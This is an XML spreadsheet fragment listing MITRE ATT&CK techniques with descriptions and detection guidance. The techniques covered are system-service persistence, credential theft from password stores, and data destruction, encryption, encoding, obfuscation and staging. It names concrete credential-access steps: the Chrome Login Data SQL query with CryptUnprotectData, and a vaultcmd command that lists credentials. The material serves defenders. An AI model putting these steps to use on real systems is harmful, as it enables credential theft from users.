    <t>Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s  KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Service: Service Creation, Service: Service Modification</t>
  </si>
  <si>
    <t>T1543.004</t>
  </si>
  <si>
    <t>Create or Modify System Process: Launch Daemon</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create or modify launch daemons to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization.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Adversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories  (Citation: OSX Malware Detection). The daemon name may be disguised by using a name from a related operating system or benign software (Citation: WireLurker). Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root. 
The plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon’s executable and gain persistence or Privilege Escalation. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/004</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for launch daemon creation or modification through plist files and utilities such as Objective-See's KnockKnock application. </t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification</t>
  </si>
  <si>
    <t>T1543.002</t>
  </si>
  <si>
    <t>Create or Modify System Process: Systemd Service</t>
  </si>
  <si>
    <t>Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.
Systemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the &lt;code&gt;/etc/systemd/system&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; directories and have the file extension &lt;code&gt;.service&lt;/code&gt;. Each service unit file may contain numerous directives that can execute system commands:
* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. 
* ExecReload directive covers when a service restarts. 
* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.
Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)
While adversaries typically require root privileges to create/modify service unit files in the &lt;code&gt;/etc/systemd/system&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; directories, low privilege users can create/modify service unit files in directories such as &lt;code&gt;~/.config/systemd/user/&lt;/code&gt; to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/002</t>
  </si>
  <si>
    <t>Systemd service unit files may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/systemd/system&lt;/code&gt;, &lt;code&gt;/usr/lib/systemd/system/&lt;/code&gt;, and &lt;code&gt;/home/&lt;username&gt;/.config/systemd/user/&lt;/code&gt; directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: &lt;code&gt;systemctl list-units -–type=service –all&lt;/code&gt;. Analyze the contents of &lt;code&gt;.service&lt;/code&gt; files present on the file system and ensure that they refer to legitimate, expected executables.
Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as &lt;code&gt;/usr/sbin/service&lt;/code&gt; may reveal malicious systemd service execution.</t>
  </si>
  <si>
    <t>T1543.003</t>
  </si>
  <si>
    <t>Create or Modify System Process: Windows Service</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). 
Adversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system.
An adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. 
Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/003</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. Remote access tools with built-in features may also interact directly with the Windows API to perform these functions outside of typical system utilities. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts.  
Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns)  
Creation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software.
Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques.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</si>
  <si>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OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Matthew Demaske, Adaptforward; Pedro Harrison; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1555</t>
  </si>
  <si>
    <t>Credentials from Password Stores</t>
  </si>
  <si>
    <t>Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555</t>
  </si>
  <si>
    <t>Monitor system calls, file read events, and processes for suspicious activity that could indicate searching for a password  or other activity related to performing keyword searches (e.g. password, pwd, login, store, secure, credentials, etc.) in process memory for credentials. File read events should be monitored surrounding known password storage applications.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Access, Process: Process Creation</t>
  </si>
  <si>
    <t>T1555.003</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Credentials from Web Browsers</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.
For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, &lt;code&gt;AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt; and executing a SQL query: &lt;code&gt;SELECT action_url, username_value, password_value FROM logins;&lt;/code&gt;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function &lt;code&gt;CryptUnprotectData&lt;/code&gt;, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018)
Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).
Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)
After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/003</t>
  </si>
  <si>
    <t>12 February 2020</t>
  </si>
  <si>
    <t>Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: &lt;code&gt;AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt;. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser. Monitor process execution logs to include PowerShell Transcription focusing on those that perform a combination of behaviors including reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>Barry Shteiman, Exabeam; RedHuntLabs, @redhuntlabs; Ryan Benson, Exabeam; Sylvain Gil, Exabeam</t>
  </si>
  <si>
    <t>T1555.001</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Keychain</t>
  </si>
  <si>
    <t>Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in &lt;code&gt;~/Library/Keychains/&lt;/code&gt;,&lt;code&gt;/Library/Keychains/&lt;/code&gt;, and &lt;code&gt;/Network/Library/Keychains/&lt;/code&gt;. (Citation: Wikipedia keychain) The &lt;code&gt;security&lt;/code&gt; command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.
To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/001</t>
  </si>
  <si>
    <t>17 February 2020</t>
  </si>
  <si>
    <t>Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1555.005</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Password Managers</t>
  </si>
  <si>
    <t>Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
 Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/005</t>
  </si>
  <si>
    <t>Consider monitoring API calls, file read events, and processes for suspicious activity that could indicate searching in process memory of password managers. 
Consider monitoring file reads surrounding known password manager applications.</t>
  </si>
  <si>
    <t>Matt Burrough, @mattburrough, Microsoft</t>
  </si>
  <si>
    <t>T1555.002</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Securityd Memory</t>
  </si>
  <si>
    <t>An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain) (Citation: OSX Keydnap malware)
In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/002</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for activity surrounded users searching for credentials or using automated tools to scan memory for passwords.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Access</t>
  </si>
  <si>
    <t>T1555.004</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Windows Credential Manager</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.
Credential Lockers store credentials in encrypted &lt;code&gt;.vcrd&lt;/code&gt; files, located under &lt;code&gt;%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\&lt;/code&gt;. The encryption key can be found in a file named &lt;code&gt;Policy.vpol&lt;/code&gt;, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)
Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. &lt;code&gt;vaultcmd.exe&lt;/code&gt; is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may gather credentials by reading files located inside of the Credential Lockers. Adversaries may also abuse Windows APIs such as &lt;code&gt;CredEnumerateA&lt;/code&gt; to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Adversaries may use password recovery tools to obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/004</t>
  </si>
  <si>
    <t>15 March 2021</t>
  </si>
  <si>
    <t>Monitor process and command-line parameters of &lt;code&gt;vaultcmd.exe&lt;/code&gt; for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., &lt;code&gt;vaulcmd /listcreds:“Windows Credentials”&lt;/code&gt;).(Citation: Malwarebytes The Windows Vault)
Consider monitoring API calls such as &lt;code&gt;CredEnumerateA&lt;/code&gt; that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Consider monitoring file reads to Vault locations, &lt;code&gt;%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\&lt;/code&gt;, for suspicious activity.(Citation: Malwarebytes The Windows Vault)</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Bernaldo Penas Antelo; Mugdha Peter Bansode</t>
  </si>
  <si>
    <t>T1485</t>
  </si>
  <si>
    <t>Data Destruction</t>
  </si>
  <si>
    <t>Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as &lt;code&gt;del&lt;/code&gt; and &lt;code&gt;rm&lt;/code&gt; often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional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2017)(Citation: Talos Olympic Destroyer 2018).
In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1485</t>
  </si>
  <si>
    <t>14 March 2019</t>
  </si>
  <si>
    <t>25 March 2021</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command-line parameters of binaries that could be involved in data destruction activity, such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the creation of suspicious files as well as high unusual file modification activity. In particular, look for large quantities of file modifications in user directories and under &lt;code&gt;C:\Windows\System32\&lt;/code&gt;.
In cloud environments, the occurrence of anomalous high-volume deletion events, such as the &lt;code&gt;DeleteDBCluster&lt;/code&gt; and &lt;code&gt;DeleteGlobalCluster&lt;/code&gt; events in AWS, or a high quantity of data deletion events, such as &lt;code&gt;DeleteBucket&lt;/code&gt;, within a short period of time may indicate suspicious activity.</t>
  </si>
  <si>
    <t>IaaS, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Deletion, Command: Command Execution, File: File Deletion, File: File Modification, Image: Image Deletion, Instance: Instance Deletion, Process: Process Creation, Snapshot: Snapshot Deletion, Volume: Volume Deletion</t>
  </si>
  <si>
    <t>Brent Murphy, Elastic; David French, Elastic; Prasad Somasamudram, McAfee; Sekhar Sarukkai, McAfee ; Syed Ummar Farooqh, McAfee; Varonis Threat Labs</t>
  </si>
  <si>
    <t>T1132</t>
  </si>
  <si>
    <t>Data Encoding</t>
  </si>
  <si>
    <t>Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1132</t>
  </si>
  <si>
    <t>14 March 2020</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</si>
  <si>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</si>
  <si>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Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Itzik Kotler, SafeBreach</t>
  </si>
  <si>
    <t>T1132.002</t>
  </si>
  <si>
    <t>Data Encoding: Non-Standard Encoding</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1132/002</t>
  </si>
  <si>
    <t>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</si>
  <si>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T1132.001</t>
  </si>
  <si>
    <t>Data Encoding: Standard Encoding</t>
  </si>
  <si>
    <t>Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1132/001</t>
  </si>
  <si>
    <t>T1486</t>
  </si>
  <si>
    <t>Data Encrypted for Impact</t>
  </si>
  <si>
    <t>Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)
To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)
In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1486</t>
  </si>
  <si>
    <t>15 March 2019</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.
In some cases, monitoring for unusual kernel driver installation activity can aid in detection.
In cloud environments, monitor for events that indicate storage objects have been anomalously replaced by copies.</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Metadata, Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>Oleg Kolesnikov, Securonix</t>
  </si>
  <si>
    <t>T1565</t>
  </si>
  <si>
    <t>Data Manipulation</t>
  </si>
  <si>
    <t>Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.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</si>
  <si>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t>
  </si>
  <si>
    <t>02 March 2020</t>
  </si>
  <si>
    <t>Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1565.003</t>
  </si>
  <si>
    <t>Data Manipulation: Runtime Data Manipulation</t>
  </si>
  <si>
    <t>Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process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</si>
  <si>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https://attack.mitre.org/techniques/T1565/003</t>
  </si>
  <si>
    <t>Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values.</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1565.001</t>
  </si>
  <si>
    <t>Data Manipulation: Stored Data Manipulation</t>
  </si>
  <si>
    <t>Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data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</si>
  <si>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https://attack.mitre.org/techniques/T1565/001</t>
  </si>
  <si>
    <t>Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Modification</t>
  </si>
  <si>
    <t>T1565.002</t>
  </si>
  <si>
    <t>Data Manipulation: Transmitted Data Manipulation</t>
  </si>
  <si>
    <t>Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1565/002</t>
  </si>
  <si>
    <t xml:space="preserve">Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data. </t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1001</t>
  </si>
  <si>
    <t>T1001.001</t>
  </si>
  <si>
    <t>Data Obfuscation: Junk Data</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1001/001</t>
  </si>
  <si>
    <t>T1001.003</t>
  </si>
  <si>
    <t>Data Obfuscation: Protocol Impersonation</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.  
Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1001/003</t>
  </si>
  <si>
    <t>T1001.002</t>
  </si>
  <si>
    <t>Data Obfuscation: Steganography</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1001/002</t>
  </si>
  <si>
    <t>T1074</t>
  </si>
  <si>
    <t>Data Staged</t>
  </si>
  <si>
    <t>Adversaries may stage collected data in a central location or directory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location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1074</t>
  </si>
  <si>
    <t>Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, File: File Creation</t>
  </si>
  <si>
    <t>Praetorian; Shane Tully, @securitygypsy</t>
  </si>
  <si>
    <t>T1074.001</t>
  </si>
  <si>
    <t>Data Staged: Local Data Staging</t>
  </si>
  <si>
    <t>Adversaries may stage collected data in a central location or directory on the local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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1074/001</t>
  </si>
  <si>
